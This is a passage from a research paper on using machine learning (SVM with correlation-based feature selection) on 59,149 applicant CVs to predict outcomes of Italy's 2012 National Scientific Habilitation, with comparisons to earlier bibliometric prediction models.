strategy (i.e., a combination of peer review and bibliometric indicators). We discuss the main recent works on this topic. To facilitate the readers, Table 1 summarizes the main information about them and our study. A first challenge concerns the problem of identifying a subset of bibliometric indicators for predicting other bibliometric indices. Ibáñez et al. (2016) introduced an approach based on Gaussian Bayesian networks to identify the best subset of predictive variables. The Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 4/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.199 approach has been tested on the data of 280 Spanish full professors of Computer Science using 12 bibliometric indicators. The main drawback of the work is that no evaluation is presented: only a test on a small sample composed of three cases is discussed in the paper. Other works focused on the prediction of papers citations. Danell (2011) used previous publication volume and citation rate of authors to predict the impact of their articles. The aim of this work is to investigate whether evaluations systems based on researchers’ track records actually reward excellence. The study focused on two disciplines (i.e., episodic memory research and Bose–Einstein condensate) and developed a quantile regression model based on previous publication volume and citation rate to predict authors’ relative citation rate. Another work (Fu & Aliferis, 2010) faces the problem of predicting the number of citations that a paper will receive using only the information available at publication time. The used model is based on support vector machines, and has been tested on a mixture of bibliometric features and content-based features extracted from 3788 biomedical articles. A recent work (Lindahl, 2018) investigates the ability of four indices to predict whether an author will attain excellence—operationalized by the indicator defined in (Bornmann, 2013)—in the following four years. The developed model is based on logistic regression and has been tested on a dataset composed of the track records of 406 mathematicians. Only a few works focused on the problem of using bibliometric indicators to predict the results of evaluation procedures performed through peer-review processes. Vieira, Cabral & Gomes (2014a) compare three models for predicting the success of applicants to academic positions. The test dataset is composed of the track records of 174 candidates to 27 selection processes for associate and full professor in hard sciences that took place in Portugal between 2007 and 2011. The areas of Chemistry, Physics, Biology, Mathematics, Mechanics, Geology, and Computer Science were considered. In all cases, candidates have been assessed by a panel of peers, producing a ranking of the applicants. Starting from 12 bibliometric indicators (i.e., number of documents, percentage of cited, highly cited and citing documents, average number of authors, hnf -index, NIR, SNIP, SJR, percentage of international collaborations, normalized impact and the number of Scimago’s Q1 journals) a few composite indices have been derived through a factor analysis. Following a discrete choice model, three predictive models based on Rank Ordered Logistic Regression (ROLR) have been defined. The best model is able to predict the applicants placed in the first position by peers in 56% of the cases. By considering the problem of predicting the relative position of two candidates (i.e., who will be ranked in the higher position), the best model is able to predict 76% of the orderings. In another work (Vieira, Cabral & Gomes, 2014b), the performances of these models have been compared with a random model, observing that in 78% of the cases the applicant placed in first position by peers has a probability of being placed first that is better than chance. The authors conclude that the predictions provided by the models are satisfactory, and suggest that they can be used as an auxiliary instrument to support peer judgments. Another work tested the predictive power of eight indicators for predicting scientists promotions (Jensen, Rouquier & Croissant, 2009). The dataset used in the study is composed of the track records of 3,659 CNRS researchers from all disciplines that have filled the CNRS report between 2005 and 2008, whose data has been obtained by querying the Web of Science Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 5/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.199 database. In the same timespan, the promotions of about 600 CNRS researchers at all the five CNRS levels have been considered. A binomial regression model (logit) has been used to assess the overall relevance of eight quantitative indicators (h-index, normalized h-index, number of publications and citations, mean citations per paper, h-index per paper, age, gender) and to study their dependence. The results showed that the h-index is the best index for predicting the promotions, followed by the number of publications. Differences exist between disciplines: in Engineering, for instance, the number of publications is the best predictor. A logit model based on the best overall predictor (i.e., h-index) has been tested for each subdiscipline, leading to correct predictions in 48% of the cases. The authors conclude that bibliometric indicators do much better than randomness, which would achieve 30% of guessed promotions. A recent study (Tregellas et al., 2018) focused on the problem of predicting career outcomes of academics using the information in their publication records. The objective of the work is to identify the main factors that may predict the success of young researchers in obtaining tenure-track faculty research positions. The dataset used in this study is composed of the track records of 363 PhD graduates from biomedical sciences programs at the University of Colorado from 2000 to 2015. The ratio of faculty/non-faculty members (i.e., individuals employed/not employed in faculty positions) is 12%. For each PhD graduate, 10 indicators has been computed (i.e., sex, date of graduation, number of first-author and non-first-author publications , average impact factor of first-author and non-first-author publications, highest impact factor of first-author and non-first-author publications, weighted first-author and non-first-author publication count). Logistic regression models and support vector machines has been used to investigate and compare the ability of the aforementioned indicators to predict career outcomes. The best prediction has been performed by the logistic regression model using three predictors (i.e., sex, date of graduation, and weighted first-author publication count), showing 73% accuracy . A similar result (i.e., 71% accuracy) has been obtained by the best model based on support vector machines using the same predictors. The results suggest that, while sex and months since graduation also predict career outcomes, a strong predoctoral first-author publication record may increase the likelihood of obtaining an academic faculty research position. The analysis of the results also showed for all models high negative predictive values (i.e., high accuracy in predicting those who will not obtain a faculty position), while low positive predictive values. This suggests that first-author publications are necessary but not sufficient for obtaining a faculty position. The main limitation of the study concerns the dataset size, since it was conducted on a small set of individuals at only one institution, focusing on a single discipline. The authors observe that it is then necessary to determine how generalizable the current findings are. Finally, the fact that all the best models are less than 75% accurate suggests that variables other than those considered here are also likely to be important factors in predicting future faculty status. Other empirical studies focused on a single indicator (i.e., the h-index) to assess how it correlates with peer judgements. These works have the main limitation of being carried out on small samples for technical reasons (i.e., the difficulty of obtaining large sets of robust bibliometric data). In practice, they were generally limited to a single discipline: Bornmann Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 6/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.199 & Daniel (2007) studied 414 applications to long-term fellowships in biomedicine, Van Raan (2006) analyzed the evaluation of about 700 researchers in chemistry, Cronin & Meho (2006) studied 31 influential information scientists from the US. To the best of our knowledge, no other work analyzed the predictive power of quantitative indicators for predicting the results of peer judgments of researchers. METHODS AND MATERIAL This section provides necessary background information about the ASN and describes the ASN dataset, the techniques used to analyze this text corpus, and the ontology developed for storing data in a semantic format. A description of the classification and feature selection algorithms used in the analyses presented in ‘‘Results’’ concludes the section. Data from the Italian Scientific Habilitation Background The Italian Law 240/2010 (Law, 2011) introduced substantial changes in the national university system. Before 2010, in the Italian universities there were three types of tenured positions: assistant professor, associate professor and full professor. The reform suppressed the position of assistant professor and replaced it with two types of fixed term positions called type A and type B researcher. Type A positions last for three years and can be extended for other two years. Type B positions last for three years and have been conceived as a step for becoming tenured associate professor, since at the time of recruitment universities must allocate resources and funding for the promotion. Each academic is bound to a specific Recruitment Field (RF), which corresponds to a scientific field of study. RFs are organized in groups, which are in turn sorted into 14 Scientific Areas (SAs). In this taxonomy defined by Decree 159 (Ministerial Decree 159, 2012), each of the 184 RFs is identified by an alphanumeric code in the form AA/GF, where AA is the ID of the SA (in the range 01-14), G is a single letter identifying the group of RFs, and F is a digit denoting the RF. For example, the code of the RF ‘‘Neurology’’ is 06/D5, which belongs to the group ‘‘Specialized Clinical Medicine’’ (06/D), which is part of the SA ‘‘Medicine’’ (06). The 14 SAs are listed in Table 2, and the 184 RFs are listed in (Poggi et al., 2018b). Under the new law, only people that attained the National Scientific Habilitation (ASN) can apply for tenured positions in the Italian university system. It is important to note that an habilitation does not guarantee any position by itself. The ASN has indeed been conceived to attest the scientific maturity of researchers and is a requirement for accessing to a professorship in a given RF. Each university is responsible for creating new positions for a given RF and professional level provided that financial and administrative requirements are met, and handles the hiring process following local regulations and guidelines. The first two sessions of the ASN took place in 2012 and 2013. Although the Law 240/2010 prescribes that the ASN must be held at least once a year, the next sessions took place in 2016 (1 session), 2017 (2 sessions) and 2018 (2 sessions). At the time of the writing of this article, the last session of the 2018 ASN was still in progress, and the dates of the next sessions have not yet been set. For each of the 184 RFs, the Ministry of University and Research (MIUR) appoints an examination committee for the evaluation of Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 7/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.199 Table 2 The 14 Italian scientific areas. For each we report the numeric ID, a three-letter code, the name of the area and the number of RFs it contains. ID Code Area name N. of recr. fields 01 MCS Mathematics and Computer Sciences 7 02 PHY Physics 6 03 CHE Chemistry 8 04 EAS Earth Sciences 4 05 BIO Biology 13 06 MED Medical Sciences 26 07 AVM Agricultural Sciences and Veterinary Medicine 14 08 CEA Civil Engineering and Architecture 12 09 IIE Industrial and Information Engineering 20 10 APL Antiquities, Philology, Literary Studies, Art History 19 11 HPP History, Philosophy, Pedagogy and Psychology 17 12 LAW Law 16 13 ECS Economics and Statistics 15 14 PSS Political and Social Sciences 7 Total 184 the candidates. The committees are composed of five full professors who are responsible for the evaluation of the applicants for associate and full professor. Committee members are randomly selected from a list of eligible professors, for a total of 920 professors. Different committees have been appointed for 2012, 2013 and 2016-18 sessions, respectively. In order to apply to a session of the ASN, candidates have to submit a curriculum vitae with detailed information about their research activities. Although the ASN is bound to a specific RF and professional level, it is possible to apply in different RFs and roles. In 2012, for example, 136/260 (52.3%) applicants for full professor in the RF 09/H1 (Information Processing Systems) also applied to 01/B1 (Informatics). Those who fail to get an habilitation cannot apply again to the same RF and level in the next session. Once acquired, an habilitation lasts for six years. The ASN introduced two types of parameters called bibliometric and non-bibliometric indicators, respectively. Bibliometric indicators apply to scientific disciplines for which reliable citation databases exist. The three bibliometric indicators are: • Normalized number of journal papers • Total number of citations received • Normalized h-index. Since citations and paper count increase over time, normalization based on the scientific age (the number of years since the first publication) is used to compute most of the indicators. The aforementioned indicators are used for all RFs belonging to the first nine SAs (01-09), with the exception of the RFs 08/C1, 08/D1, 08/E1, 08/E2, 08/F1 and the four RFs belonging to the group Psichology (11/E). These RFs are collectively denoted as bibliometric disciplines. Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 8/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.199 Table 3 The number of applications for associate and full professor for each session of the ASN. Session Associate professor Full professor Total 2012 41,088 18,061 59,149 2013 11,405 5,013 16,418 2016 13,119 7,211 20,330 2017a 3,254 1,515 4,769 2017b 2,501 1,322 3,823 2018a 5,176 2,445 7,261 Total 76,543 35,567 112,110 Non-bibliometric indicators apply for the RFs for which MIUR assessed that citation databases are not ‘‘sufficiently complete’’, and hence bibliometric indices can not be reliably computed. The three non-bibliometric indicators are: • Normalized number of published books • Normalized number of book chapters and journal papers • Normalized number of paper published on ‘‘top’’ journals. These are used for all RFs belonging to the last five SAs (10–14) with the exceptions described above. These RFs are denoted as non-bibliometric disciplines. It is important to remark that this terminology (i.e., ‘‘bibliometric’’ and ‘‘non-bibliometric’’) is used in the official MIUR documents but it is not consistent with that used by the scientometric community. Non-bibliometric indicators, for instance, are indeed bibliometric being based on paper counts. Given that these terms became standard within the Italian research community, we will follow the MIUR ‘‘newspeak’’ according to the definitions above. The values of the indicators for each candidate were computed by the National Agency for the Assessment of Universities and Research (ANVUR), a public agency established with the objective of assessing Italian academic research. Data from Scopus and Web of Science were used for this computation, and only publications in a time window of ten years before the ASN session were considered. The computed indicators and the candidates’ CVs are the only information provided to the evaluation committees for their assessments. The sessions of the ASN have been analyzed by a quantitative point of view in Marzolla (2015), Peroni et al. (2019) and Di Iorio, Peroni & Poggi (2019). ASN data The number of applications submitted to the six sessions of the ASN are reported in Table 3. We focused on the 2012 session of the ASN because: (i) it is a representative sample of the whole population asking for habilitation (this session was the first and received the more than half of the overall submissions across all years of ASN); (ii) since in 2016 different people were appointed in the committees, in this way we exclude biases and other problems introduced by changes in the evaluation committees. Overall, the 2012 session of the ASN received 59,149 applications spanning 184 RFs. For each application, we collected three different documents: the CV, the official document Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 9/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.199 with the values of the three quantitative indicators described in the previous section and the final reports of the examination committee. These documents are in PDF, and have been made publicly available on the ANVUR site for a short period of time. Some basic information and statistics about the 2012 ASN session are summarized in (Poggi et al., 2018b). Since ANVUR did not provide a template for the habilitation, the CVs are very heterogeneous, varying in terms of formatting, internal structure and organization. This heterogeneity and the massive amount of information contained in the 59,149 PDFs are two of the main challenges faced in this work. In order to manage this problem, we developed an ontology which provides an uniform representation of the information and a reference conceptual model. It is the basis of both the data processing and subsequent analyses, as described in the following sections. Ontology description The objective of the Academic Career (AC) ontology is to model the academic career of scholars. AC is an OWL2 (W3C, 2012) ontology composed of fifteen modules, each of which is responsible for representing a particular aspect of the scientific career of a scholar. The first two modules of the AC ontology concern personal information and publications. The next modules pertain to ten categories suggested by ANVUR: 1. Participation to scientific events with specific roles (eg. speaker, organizer, attendee, etc.) 2. Involvement and roles in research groups (management, membership, etc.) 3. Responsibility for studies and researches granted by qualified institutions 4. Scientific responsibility for research projects 5. Direction or participation to editorial committees 6. Academic and professional roles 7. Teaching or research assignments (fellowships) at qualified institutes 8. Prizes and awards for scientific activities 9. Results of technological transfer activities (e.g., spin-offs, patents, etc.) 10. Other working and research experiences The last three modules concern scholars’ education, scientific qualifications, and personal skills and expertise. Data processing The processing of a vast set of documents such as the corpus of the ASN curricula is not a trivial task. The main issue to face in this process is the management and harmonization of its heterogeneity in terms of kinds of information, structures (e.g., tables, lists, free text), styles, languages, just to cite a few. Nonetheless, the automatic extraction of information from CVs and its systematization in a machine processable format is a fundamental step for this work, since all the analyses described in ‘‘Results’’ are based on these data. For this purpose, we developed PDF to Academic Career Ontology (PACO), a software tool that is able to process the researchers’ CVs, extract the most relevant information, and produce a Knowledge Graph that conforms to the AC ontology. The processing performed Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 10/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.199 Figure 1 An overview of the PACO toolchain composed of four sub-modules (circles). Artifacts (i.e., inputs/outputs of the sub-modules) are depicted as rectangles. Full-size DOI: 10.7717/peerjcs.199/fig-1 by PACO is composed of four consecutive steps, that correspond to the software modules constituting PACO’s architecture, as shown in Fig. 1. The processing of an applicant’s CV can be summarized as follows: • HTML conversion: The PDF2HTML Converter takes as input a PDF and produces as output an HTML version of the CV composed of inline elements and presentational elements. The structure of the document is not reconstructed in this phase. In particular, the containment relations between elements (e.g., cells in a table, items in a list, etc.) are missing. For instance, a table is converted into a series of rectangles with borders (the cells) followed by a series of inline elements (the text). All the elements are at the same level in the output document hierarchy, and no explicit relation between them is maintained. • Structure re-construction: the Structure Builder uses the presentational information computed in the previous phase to infer the structure of the document. Different strategies have been developed to recognize meaningful patterns in the presentation and reconstruct the document hierarchy. For example, a mark positioned near an inline element containing text is interpreted as a list item, a sequence of consecutive list items is interpreted as a list. The output is an XML document, in which the original textual content is organized in meaningful structural elements. • Semantic analysis: the objective of the Semantic Analyzer is to annotate the output of the previous phase with information about its content. For example, it has to infer if a list is a list of publications, awards, projects, etc. A series of analyses is performed for each element, from simple ones (e.g., to test if an element contains a name, surname, birth date, etc.) implemented through basic techniques such as the use of heuristics or pattern matching, to more complex ones (e.g., to identify publications, roles, etc.) implemented using external tools and libraries. Another important technique is to leverage the homogeneity of structured elements (e.g., of all the items in a list or all the cells of a column) to infer meaningful information about their content, using the approach described in (Poggi, Cigna & Nuzzolese, 2016). The basic idea is that, for instance, if the majority of the elements of a list have been recognized as publications, it is then reasonable to conclude that also the others are publications. The output of this phase is an XML document annotated with the results of the semantic analysis. • Triplification: the Triplifier is responsible for populating a Knowledge Graph with the information inferred in the previous phase. The marked XML document is the input of this stage, and the output is a Knowledge Graph that conforms to the AC ontology. Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 11/28 https://peerj.com https://doi.org/10.7717/peerjcs.199/fig-1 http://dx.doi.org/10.7717/peerj-cs.199 2http://cercauniversita.cineca.it/ is a MIUR service that provides information and statics about Italian professors, universities, degree programs, students, fundings, etc. 3TAking STock: external engagement by academics (TASTE) is an European project founded under the FP7 program that developed a database with data about the relation between universities and enterprises in Italy—see https: //eventi.unibo.it/taste. 4Semantic Scout is a service that provides CNR scientific and administrative data in a semantic format—see http://stlab.istc.cnr. it/stlab/project/semantic-scout/. The data extracted from the applicants’ CVs by PACO have also been semantically enriched with information from the following external sources: • Cercauniversita2 : for information about the candidates’ careers within the Italian university system; • TASTE database3 : for data about reserchers’ entrepreneurship and industrial activities from the TASTE database; • Semantic Scout4 : for information about researchers of the Italian National Council of Research (CNR). The final outcome of this process is the Knowledge Graph from which we computed the predictors used in the analyses discussed in the following of this paper. Identification of the prediction algorithm In order to implement a supervised learning approach, we needed to create a training set in which the ground truth is obtained from the final reports of the examination committees. The instances of our dataset correspond to the 59,149 applications submitted to the 2012 ASN. For each instance, we collected 326 predictors, 309 of which are numeric and 17 are nominal. The only source of data used to build our dataset is the Knowledge Graph containing the data extracted from the applicants’ curricula and enriched with external information. The predictors that have been computed belong to one of the following two categories: • numeric and nominal values extracted from the CVs (e.g., the number of publications) or derived from the CVs using external sources (e.g., the number of journal papers has been computed using the publication list in the CVs and querying online databases like Scopus); • quantitative values calculated using the values from the previous point. For example, we computed statistical indicators such as the variance of the number of journal papers for each applicant in the last N years. The aforementioned 326 predictors and the habilitation class feature are our starting point to investigate the performances of different machine learning approaches. We decided not to explicitly split the dataset in training and test sets, and systematically rely on cross-fold validation instead. In particular, the data reported in this work are related to the 10-fold validation, but we have also performed a 3-fold one with very similar results. The following supervised machine learning algorithms have been tested: • NB: Naïve Bayes (John & Langley, 1995) • KN: K-nearest neighbours classifier (K chosen using cross validation) (Aha, Kibler & Albert, 1991) • C45: C4.5 decision tree (unpruned) (Quinlan, 2014) • RandF: Random Forest (Breiman, 2001) • SVM: Support Vector Machine trained with sequential minimal optimization (Keerthi et al., 2001). Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 12/28 http://cercauniversita.cineca.it/ https://eventi.unibo.it/taste https://eventi.unibo.it/taste http://stlab.istc.cnr.it/stlab/project/semantic-scout/ http://stlab.istc.cnr.it/stlab/project/semantic-scout/ https://peerj.com http://dx.doi.org/10.7717/peerj-cs.199 Table 4 Performance of the machine learning algorithms investigated for the classification of the ap- plicants to the RF 11/E4 (level II). For each algorithm we report Precision, Recall and F-Measure values. Precision Recall F-measure NB 0.856 0.850 0.853 KN 0.867 0.906 0.886 C45 0.865 0.914 0.888 RandF 0.844 1.000 0.916 SVM 0.894 0.951 0.922 The rationale behind this choice is to have representatives for the main classification methods that have shown effectiveness in past research. All learners have been tuned using common best practices. SVM has been tested with various kernels (in order to account for complex non-linear separating hyperplanes). However, the best results were obtained with a relatively simple polynomial kernel. The parameters for the resulting model have been tuned using the grid method (He & Garcia, 2009). We tested the learners on different data samples obtaining similar results for both bibliometric and non-bibliometric RFs. For example, Table 4 shows the results we obtained with these machine learning algorithms for the applicants to the RF 11/E4 (level II). Notice that we tested the performances of the learners only with respect to the not qualified class. We do that because we are mainly interested in understanding if we can use machine learning techniques to identify unsuccessful applicants who got not qualified. We are also reporting a limited amount of analysis data, specifically in this work we focus on precision and recall (and the related F-measure). Other aspects of the learners (such as the ROC curve) have been analyzed in our tests but they were always aligned with the results expressed by the three measures we are providing here. The results show that the best classifiers are those known to perform better on feature-rich datesets. In particular, SVM outperforms the other classification methods, and for this reason has been used in the rest of our analyses. Feature selection algorithm In this section we describe the technique we used to analyze the relevance of the various predictors for classification purposes. The task consists in identifying a small set of predictors that allows to perform accurate predictions of the ASN results (RQ2). In case of a large number of predictors, several attribute engineering methods can be applied. The most widely adopted is attribute selection, whose objective is identifying a representative set of attributes from which to construct a classification model for a particular task. The reduction of the number of attributes can help learners that do not perform well with a large number of attributes. This also helps in reducing the computation time needed to create the predictive model. Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 13/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.199 There are two main classes of attribute selection algorithms: those who analyze the performance of the learner in the selection process (i.e., wrappers) and those who do not use the learner (i.e., filters). The first class is usually computationally expensive since the learner runs continuously to check how it performs when changing the attributes in the dataset. That leads to computation times that are two or more orders of magnitude larger compared to the learner itself. For this reason, we did only some limited experiments with learner-aware attribute selection. In our test cases, the results obtained were marginally better than those obtained with processes not using the learner. Consequently, we used a filter-based approach in our in-depth analysis. We used Correlation-based Feature Selection (CFS) (Hall & Holmes, 2003), which is the first method that evaluates (and hence ranks) subsets of attributes rather than individual attributes. The central hypothesis of this approach is that good attribute sets contain attributes that are highly correlated with the class, yet uncorrelated with each other. At the heart of the algorithm is a subset evaluation heuristic that takes into account the usefulness of individual attributes for predicting the class along with the level of intercorrelation among them. The aforementioned technique has been used in the analysis presented in ‘‘Analysis of the Quantitative Indicators of Applicants’’. RESULTS The aim of the analyses presented in this section is to answer the two Research Questions (RQs) discussed in ‘‘Introduction’’. Given the huge amount of data provided by the curricula of the applicants, we want to understand if machine learning techniques can be used to effectively distinguish between candidates who got the habilitation and those who did not (RQ1). We are also interested in identifying a small set of predictors that can be used to perform accurate predictions for the different RFs and scientific levels of the ASN (RQ2). We conclude this section with an assessment of the predictive power of our approach, in which we compare our best models with those that have been proposed in the literature to solve similar problems. Analysis of the recruitment fields and areas The objective of the first experiment is to predict the results of the ASN (RQ1). We used SVM, which is the best machine learning algorithm emerged from the tests discussed in ‘‘Identification of the Prediction Algorithm’’. We classified our dataset with respect to the class of candidates who got the habilitation using the SVM learner. We first split the dataset into two partitions containing the data about candidates for level I and level II, respectively. For each partition, we classified separately the applicants of each RF. The results of our analysis are published in Poggi et al. (2018a), and are summarized by the boxplots in Fig. 2. The boxplot is a method for graphically depicting the distribution of data through their quartiles. The central rectangle spans the first quartile to the third quartile. The segment inside the rectangle shows the median, and ‘‘whiskers’’ above and below the box show the locations of the minimum and maximum. From these results, we observe that the performance of the learners for bibliometric and non-bibliometric RFs are very similar, and that they are distributed evenly (i.e., there is not Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 14/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.199 Figure 2 Boxplots depicting the performance of the SVM algorithm for academic level I and II. Preci- sion, Recall and F-measure values are reported for bibliometric (A, C) and non-bibliometric (B, D) RFs. Full-size DOI: 10.7717/peerjcs.199/fig-2 a polarization of bibliometric and non-bibliometric RFs). Moreover, we note that 154/184 (83.7%) and 162/184 (88%) RFs have F-measure scores higher than 0.6 for professional level I and II, respectively. We also investigated the performance of the SVM learner on the data partitioned in the scientific areas in which RFs are organized. To do so, we split the dataset into 16 partitions: Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 15/28 https://peerj.com https://doi.org/10.7717/peerjcs.199/fig-2 http://dx.doi.org/10.7717/peerj-cs.199 nine for bibliometric SAs (01-09), one for the macro sector 11/E (Psicology) which is bibliometric, five for non-bibliometric SAs (10-14), and one for the RFs 08/C1, 08/D1, 08/E1, 08/E2 and 08/F1 which are non-bibliometric. The results for both professional levels are summarized in Fig. 3, and the whole data are reported in Poggi et al. (2018a). Also in this case, results are very accurate for both bibliometric and non-bibliometric disciplines, with F-measure scores spanning from a minimum of 0.622 (07-AVM) and 0.640 (02-PHY) for professionals level I and II, and a maximum of 0.820 (11-HPP) and 0.838 (14-PSS) for professional levels I and II. We observe that, at the associate professor level, the performance for non-bibliometric SAs (Fig. 3D) are significantly better than for bibliometric SAs (Fig. 3C). Moreover, the variance of the values is much lower for non-bibliometric SAs, as showed by the boxplots which are significantly more compressed. Analysis of the quantitative indicators of applicants The objective of the next experiment is to identify a small set of predictors that allows to perform accurate predictions of the ASN results (RQ2). To this end, we analyzed the relevance of the various predictors for classification purposes using the CFS algorithm described in ‘‘Feature Selection Algorithm’’. The first step of our investigation consists of splitting our training set into partitions corresponding to the two professional levels of the ASN, and running the CFS filters on the data of each RF. We then produced a ranking of the selected predictors by counting the occurrences of each of them in the results of the previous computation. Figure 4 reports the top 15 predictors for the two professional levels considered. We used the best overall learner emerged from the aforementioned tests (i.e., SVM) and applied it, for each academic level and RF, considering the top 15 predictors. The results of our analysis on the 184 RFs are summarized in Fig. 5, and the whole data are reported in Poggi et al. (2018a). We observe that there has been a slight improvement in performances if compared to those obtained using all the predictors: 162/184 (88%) and 163/184 (88.6%) RFs have F-measure scores higher than 0.6 for professional level I and II, respectively. Moreover, also in this case, the results for bibliometric and non-bibliometric RFs are similar. An analysis of the indicators selected as top 15 predictors is presented in ‘Discussion’. Evaluation In order to assess the predictive power of our approach, in this section we compare our best models with those that have been proposed in the literature to solve similar problems. As discussed in ‘‘Related Work’’, three works are particularly relevant for this task: Vieira’s model (2014a) based on rank ordered regression, Jensen’s binomial regression model (2009), and the models developed by Tregellas et al. (2018). A first analysis can be performed comparing the information summarized in Table 1 about the sizes of the datasets and the scopes of these works with our investigation. By considering the number of authors and papers, we observe that our dataset is some orders of magnitude greater than the others: i.e., 59,149 authors (our work) vs. 174 (Vieira), 3,659 Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 16/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.199 Figure 3 Boxplots depicting the performance of the SVM algorithm for academic level I and II. Preci- sion, Recall and F-measure values are reported for bibliometric (A, C) and non-bibliometric (B, D) SAs. Full-size DOI: 10.7717/peerjcs.199/fig-3 (Jensen) and 363 (Tregellas) authors; 1,910,873 papers (our work) vs. 7,654 papers (Vieira). We also remark that Vieira’s (2014a) and Tregellas’s (2018) work are limited to very small samples of researchers from Portugal and the United States, while our and Jensen’s works analyze a nationwide population. Moreover, while the other works focused on a limited set of indicators (Vieira’s (2014a) model is based on three indicators, Jensen’s (2009) on eight and Tregellas’s (2018) on ten), we extracted a richer set of indicators from candidates’ CVs (326 predictors). We also observe that, while our work and Jensen’s (2009) cover all the disciplines, Vieira (2014a) limits the analysis to seven disciplines in hard sciences, and Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 17/28 https://peerj.com https://doi.org/10.7717/peerjcs.199/fig-3 http://dx.doi.org/10.7717/peerj-cs.199 Figure 4 Top 15 predictors selected by the CFS filter for professional level I (A) and II (B). The x-axis shows how many times the predictors have been chosen by the CFS algorithm. Full-size DOI: 10.7717/peerjcs.199/fig-4 Tregellas (2018) to biomedical sciences. Overall, our dataset is very wide and rich, and less exposed to issues (e.g., biases) than those used in the other three works. In order to evaluate the predictive power of our approach, we have to compare its performances with those of the aforementioned works. For this purpose, all the proposed predictive models must be tested on the same data. Since none of the datasets used in the considered works are freely available, we decided to test the models on representative samples extracted from our dataset, and compare the results with our approach. The first model proposed by Vieira (2014a) is based on a composite predictor that encompasses 12 standard bibliometric indicators and that is obtained through factor analysis. Unfortunately, the authors don’t provide a definition of such composite predictor, nor they discuss the details on how it has been computed. Given the lack of such information, we observed that is impossible to replicate the model and decided to exclude Vieira’s (2014a) model from this experiment. Jensen’s (2009) model is a binomial regression model based on eight indicators: h, hy, number of publications and citations, mean citations/paper, h/number of papers, age and gender. We decided to focus this analysis on the applicants to the associate professor level for two RFs: Informatics (01/B1) and Economics (13/A1). These two RFs have been chosen as representatives of bibliometric and non-bibliometric recruitments fields because they best meet two important criteria: (i) they received a very high number of applications; (ii) the two populations (i.e., those who attained the habilitation and those who did not attained it) are well balanced. For the same Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 18/28 https://peerj.com https://doi.org/10.7717/peerjcs.199/fig-4 http://dx.doi.org/10.7717/peerj-cs.199 Figure 5 Boxplots depicting the performance of the SVM algorithm for academic level I and II using the top 15 predictors. Precision, Recall and F-measure values are reported for bibliometric (A, C) and non-bibliometric (B, D) RFs. Full-size DOI: 10.7717/peerjcs.199/fig-5 reason we also considered the SAs ‘‘Mathematics and Computer Science’’ (MCS-01, bibliometric) and ‘‘Economics and Statistics’’ (ECS-13, non-bibliometric). In this way we are able to assess the predictive power of the models at different levels of granularity, both for bibliometric and non-bibliometric RFs and SAs. Since the indicators used by Jensen’s (2009) models that were not present in our dataset (i.e., mean citations/paper, h/number of papers) could be derived from our data, we computed and added them to Poggi et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.199 19/28 https://peerj.com https://doi.org/10.7717/peerjcs.199/fig-5 http://dx.doi.org/10.7717/peerj-cs.199 Table 5 Comparison of the performances of our models (OUR-SVM) with Jensen’s (2009) models using eight predictors (J-LOG8) and one pre- dictor (J-LOG1). Best Precision, Recall and F-measure values are in bold. Field/ Precision Recall F-measure Area J-LOG8 J-LOG1 OUR-SVM J-LOG8 J-LOG1 OUR-SVM J-LOG8 J-LOG1 OUR-SVM 01/B1 0.592 0.611 0.718 0.588 0.578 0.773 0.590 0.594 0.744 13/A1 0.611 0.635 0.724 0.683 0.579 0.787 0.672 0.606 0.754 MCS-01 0.677 0.638 0.692 0.719 0.782 0.753 0.697 0.703 0.721 ECS-13 0.676 0.633 0.685 0.705 0.658 0.736 0.690 0.645 0.710 the test dataset. We then built the regression models using the aforementioned eight indicators and, as suggested by the authors, we also repeated the experiment using only the h-index, which has been identified as the one with the highest relevance. The results obtained by Jensen’s (2009) models and our models are reported in Table 5. The results show that our approach outperforms Jensen’s regression models in all the considered RFs and SAs. The only exception is the recall value of the regression model based on the only h-index (LOG1) for the MCS-01 area. However, we report that the relative F-measure, which is a measure of the overall model accuracy, is much lower than our model. This can be explained by considering the low model precision, which is probably caused by an high number of false positives. By comparing the F-measure values of the models we also observe that the regression models have the worst performances in non-bibliometric fields and areas (i.e., RF 13/A1 and SA ECS-13). The main reason is that the quantitative indicators used by the Jensen’s (2009) models, which are mostly bibliometric, do not provide enough information for performing accurate predictions for non-bibliometric disciplines. In contrast, our approach is more stable, and leads to similar results in all RFs and SAs. The ability of our model to manage the variability of the different disciplines can be explained by the richness of the dataset on which the model is based. We also compared the performance of our approach with Tregellas et al.’s (2018) two best models based on three indicators: sex, date of graduation, and number of first-author papers. As in the previous experiment, we decided to perform the test on two RFs, one bibliometric and one non-bibliometric, following the aforementioned criteria. As representative of bibliometric RFs we chose ‘‘Molecular biology’’ (05/E2) since Tregellas et al.’s (2018) work focused on the biomedical domain, and ‘‘Economics’’ (13/A1) as representative of non-bibliometric RFs (as in the previous experiment). Two out of the three indicators used by Tregella’s models were not present in our dataset: number of first-author papers and date of graduation. While the first 